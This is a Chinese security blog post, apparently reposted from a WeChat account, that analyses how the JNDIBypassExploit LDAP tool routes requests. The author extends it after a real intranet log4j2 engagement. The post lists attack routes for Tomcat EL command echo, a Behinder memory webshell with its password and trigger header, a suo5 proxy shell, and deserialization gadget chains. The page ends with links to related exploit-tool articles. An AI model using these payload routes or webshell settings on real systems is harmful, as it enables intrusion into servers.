[工具推荐]JNDI利用分析魔改

最新推荐文章于 2026-01-09 15:15:24 发布
原创 最新推荐文章于 2026-01-09 15:15:24 发布 · 987 阅读 · 17 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #安全 #反序列化

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

免责声明

本公众号所发布的所有内容,包括但不限于信息、工具、项目以及文章,均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。

前言

实战中遇到log4j2漏洞,并且不出网,在内网另一台获得权限的主机上上传JNDIBypassExploit注入工具进行利用,在注入内存马的时候感觉不太方便,于是对该工具的代码进行学习,并进行改造。

分析

入口在Starter.java,Config.applyCmdArgs接受命令行的传参,LdapServer.start()开启ldap监听,HTTPServer.start()开启http监听。

重点看LdapServer.start(),开启ldap监听。

在构造函数LdapServer()中,使用Reflections库扫描@LdapMapping注解的控制器类, 并进行实例化,然后提取uri,将uri与控制器对象关联存储在routes中。

重写InMemoryOperationInterceptor的processSearchResult,用于拦截ldap查询请求,获取到ldap查询请求后,判断查询请求是否以前面存储在routes中的uri开头,如果不是则打印错误信息,然后return,如果是,则获取routes中uri对应的控制器对象,并调用其process和sendResult方法。

process方法用来获取传入的参数和打印信息。

sendResult方法用来构造响应数据并将响应发送给请求方。

新建

想要实现自定义的功能,只要新建一个@LdapMapping注解的Controller,并设置一个uri,重写process方法和sendResult方法即可,例如:

新建一个类,并实现LdapController接口,并重写sendResult和process接口。

添加@LdapMapping注解,并设置uri,这里为example。

在process方法中设置参数、输出信息,在sendResult方法中构造响应数据,这里是cc6的序列化数据,执行calc命令。

启动ldap服务端,发起ldap查询ldap://0.0.0.0:1389/example。

改造

加入suo5内存马,加入更多的反序列化利用链,以及反序列化gadget探测,目前payload比较少,考虑后面慢慢完善。

## tomcat el表达式
ldap://127.0.0.1:1389/tmel/echo     #添加请求头 Etags: d2hvYW1p
ldap://127.0.0.1:1389/tmel/mem      #冰蝎连接,密码 p@ss01,添加请求头 Dtags:www
ldap://127.0.0.1:1389/tmel/suo5     #请求头User-Agent中添加Tnrpvdmva
## 反序列化
ldap://127.0.0.1:1389/deser/check/all/{dnslog}
ldap://127.0.0.1:1389/deser/urldns/{dnslog}
ldap://127.0.0.1:1389/deser/cc2/{echo|mem|suo5}
ldap://127.0.0.1:1389/deser/cc6/{echo|mem|suo5}
ldap://127.0.0.1:1389/deser/cb/{echo|mem|suo5}
ldap://127.0.0.1:1389/deser/hib/{echo|mem|suo5}
ldap://127.0.0.1:1389/deser/jackson/{echo|mem|suo5}
ldap://127.0.0.1:1389/deser/rome/{echo|mem|suo5}

tomcat el表达式:

反序列化探测gadget:

反序列化利用链:

最后

本文内容仅为本人学习jndi利用工具所产出,工具可加入星球获取。

参考

LiangYueSec
关注
20篇:造冰蝎客户端适配JNDIExploit的内存马
ABC_123的博客
08-20 2826
Part1 前言JNDIExploit是一款常用的用于JNDI注入利用工具,其大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于JNDI反序列化漏洞的利用,可直接对出网情况下的JNDI进行回显。JNDIExploit这款工具注入的冰蝎内存马是经过造后的冰蝎,网上并没有造好的与之适配的冰蝎客户端放出来,原版...
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具
weixin_46280935的博客
09-10 6560
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 天翼创维awifi路由器存在多处未授权访问漏
DNSlog
遇事不决冲冲冲
08-08 1万+
什么是DNSlog DNSlog就是存储在DNS Server上的域名信息,它记录着用户对域名的访问信息,类似日志文件。 原理 payload放到目标网址(也就是dnslog的域名)的子域名处,让存在漏洞的地方去解析,由于解析了域名,发起DNS请求,DNS在解析的时候会留下日志,这些日志会反弹到dnslog的平台上,通过读取这些解析的日志,来获取信息。 使用方法 通过Burp Suite 通过在线平台 http://www.dnslog.cn/ http://ceye.io/ 利用场景 执行命令时没
Weblogic RCE + confluence RCE + cacti RCE正反向代理靶场
Love&Share
04-07 3045
与实际区别。
24、25-反序列化漏洞(JBoss、apache log4、apache Shiro、JWT)Weblogic未授权访问、代码执行、任意上传
XLbb的博客
05-16 2581
serialize() 和 unserialize() 在 PHP内部实现上是没有漏洞的,之所以会产生反序列化漏洞是因为应用程序在处理对象、术函数以及序列化相关问题的时候导致的。 当传给 unserialize() 的参数可控时,那么用户就可以注入精心构造的 payload。当进行反序列化的时候就有可能会触发对象中的一些术方法,造成意想不到的危害。 CVE-2021-2109Weblogic Server远程代码执行。apache log4j (Java日志记录库)
从druid一路杀到云控制台
Websec
10-11 312
在挖某家SRC的时候,通过域名历史解析找到一个IP,然后通过各种问题组合接管云控制台,最后告知打歪了,今天分享一波。有点标题党了,这个流程实际上也不是很难.
【漏洞利用】One-Fox综合工具箱 v6.0 公开版——最强单兵作战工具
热门推荐
qq_47493625的博客
01-04 1万+
One-Fox综合工具箱是由One-Fox安全团队出品并在微信公众号@狐狸说安全发布的一款综合工具箱,我愿称之为目前最强的单兵作战工具箱,其工具更是十分的齐全!详细工具内容请看下面截图!
【神兵利器】One-Fox工具箱V7版发布
Fly_鹏程万里
06-11 2955
在6.0版本的基础上重新规划了工具箱去除了一些工具新增些许新工具以及旧工具的新版本修复部分已知BUG优化代码逻辑,修复界面无法根据电脑分辨率进行自适应问题新增鼠标移动到工具按钮上显示文本浮框功能美化框架UI(本次为简约风格)等此工具为python语言编写,代码也留下了,未对代码进行加密,可二次开发无任何后门,不要以谣传谣,代码都是开放的,不放心的师傅可以自行查看哈,如果遇到打开界面后某些地方显示不全或者工具按钮乱掉之类的情况的话直接最小化至下方任务栏在最大化即可恢复信息探测工具
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
JNDIExploit-1.2-SNAPSHOT
03-20
JNDIExploit-1.2-SNAPSHOT
JNDI-Injection-Exploit
做你想做的人,没有时间的限制,只要愿意,什么时候都可以start。
12-12 4387
JNDI-Injection-Exploit工具比marshalsec要好用的多,相当于把http服务器和协议服务器放在了一起 github地址 https://github.com/welk1n/JNDI-Injection-Exploit.git 可以下载其release下的安装包 $ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address] 其中: -C - 远程class文件中要执行的命令。
Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109
suiyideAli的博客
04-19 1430
漏洞影响 WebLogic Server 10.3.6.0.0WebLogic Server 12.1.3.0.0WebLogic Server 12.2.1.3.0WebLogic Server 12.2.1.4.0WebLogic Server 14.1.1.0.0 漏洞复现 访问一下URL http://xxx.xxx.xxx.xxx:7001/console/css/%252e%252e%252f/consolejndi.portal![image.png](https://img-b.
Java 并发编程:JUC 包中原子操作类的原理和用法
m0_69632475的博客
01-09 334
通过上一部分的分析,我们应该基本理解了 CAS 的无锁思想,并对“法类” Unsafe 有了更全面的了解。这也是我们分析原子包的前提。接下来,让我们一步步分析 CAS 在 Java 中的应用。JDK5 之后,JUC 包提供了包,该包下提供了大量基于 CAS 的原子操作类。如果在未来你不希望对程序代码加锁,但又想避免线程安全问题,那么可以使用该包下提供的类。Atomic 包提供的操作类主要可以分为以下四种类型:基本类型原子操作类引用类型原子操作类数组类型原子操作类属性更新原子操作类。
面向微服务事件驱动与异步消息可靠处理的互联网系统高可用设计与多语言工程实践分享
2501_94180531的博客
01-05 528
事件驱动解耦服务,提高吞吐可靠投递与幂等消费保证消息一致性监控、重试与顺序控制是稳定性的关键微服务事件驱动与异步消息可靠处理,使系统在高并发和复杂业务场景下保持稳定与可控。通过在多语言系统中统一幂等语义、结合可靠投递、顺序控制和监控策略,互联网系统能够在异步流程中实现高可用和长期可维护性。这篇关于事件驱动与异步消息可靠处理的工程实践分享,希望为你在微服务高可用设计中提供可落地、长期有效的参考思路。
Java 25 switch - 表达式多条件判断
最新发布
java界的小学生
01-09 113
Java 25 switch - 表达式多条件判断 记录模式‌:支持复杂对象的模式匹配。
windows下的守护进程|nssm
slongzhang的博客
01-06 1187
NSSM(Non-Sucking Service Manager)是Windows系统中将普通程序封装为系统服务的工具。使用步骤包括:下载解压NSSM,以管理员身份运行CMD/PowerShell;通过图形界面或命令行安装服务,配置可执行文件路径、参数等;使用start/stop/restart命令管理服务;支持通过edit命令修配置或remove删除服务;建议配置日志功能方便排查问题。核心功能是实现进程守护,确保程序异常退出后自动重启。
Web开发者进阶AI:Agent技能设计模式之迭代分析与上下文聚合实战
沛哥儿的专栏
01-09 631
迭代有界:必须设置maxDepth(如同Web分页的maxPage) 上下文隔离:按会话ID分区存储(Redis key前缀隔离) 技能自治:每个Skill保持无状态(如同RESTful原则)
SpringBoot3 + GraalVM安装和初次打包
风不知从何处起的小屋
01-08 782
本文介绍了使用GraalVM将Spring Boot项目打包为原生可执行文件的完整流程。
面向对象(三)
zyhhkb的博客
01-08 444
原因:因为静态成员会随着类的加载而加载,如果所有成员都是静态的,那么当类一加载,所有的成员都会进入内存,占用大量内存空间。(1)既然static成员好用(类名直接调用,不用new对象调用),那么实际开发中,为什么不把所有成员都定义成静态的呢?如果有些功能在整个代码中重复实现,代码一样,实现功能一样,那就可以将这部分代码抽取出来,形成工具类。(2分析:方法参数位置,只明确了参数的类型,但是不明确参数个数,此时就可以定义成可变参数。a.静态成员属于类成员,不属于对象成员(非静态的成员属于对象成员)
JNDI注入攻击利用工具分析
JNDI-Injection-Exploit-1.0-SNAPSHOT-all是一个与JNDI注入相关的项目或工具,它可能包含了用于演示或利用JNDI注入漏洞的代码示例、技术细节以及相关的攻击载荷。"SNAPSHOT"通常表示这是一个正在开发中的快照版本,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值